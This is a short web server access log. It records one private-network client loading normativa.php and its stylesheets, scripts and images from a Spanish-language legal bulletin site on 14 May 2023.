172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:44:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:19:45:00 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [14/May/2023:19:45:00 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:19:45:00 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/May/2023:19:45:01 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
